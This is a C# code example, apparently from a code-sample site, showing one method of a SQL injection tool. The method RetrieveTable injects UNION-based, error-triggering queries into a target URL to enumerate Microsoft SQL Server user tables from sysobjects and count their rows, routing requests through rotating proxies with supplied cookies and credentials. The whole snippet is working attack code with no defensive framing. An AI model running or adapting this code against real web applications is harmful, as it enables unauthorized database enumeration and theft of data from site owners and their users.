Пример #1
0
        private GlobalDS.Table RetrieveTable(long PreviousTableID)
        {
            GlobalDS.Table retVal = new GlobalDS.Table();

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", "xtype=char(85) and id > " + PreviousTableID.ToString());

            string ResultPage, ResultText;

            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

            string[] values = ResultText.Split(':');

            retVal.Name     = values[0];
            retVal.ObjectID = Convert.ToInt64(values[1]);

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", values[0], null);

            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

            if (ResultText.Length > 0)
            {
                ResultText = ResultText.Substring(1, ResultText.Length - 1);

                retVal.RecordCount = Convert.ToInt64(ResultText.Trim());
            }
            else
            {
                retVal.RecordCount = -1;
            }
            return(retVal);
        }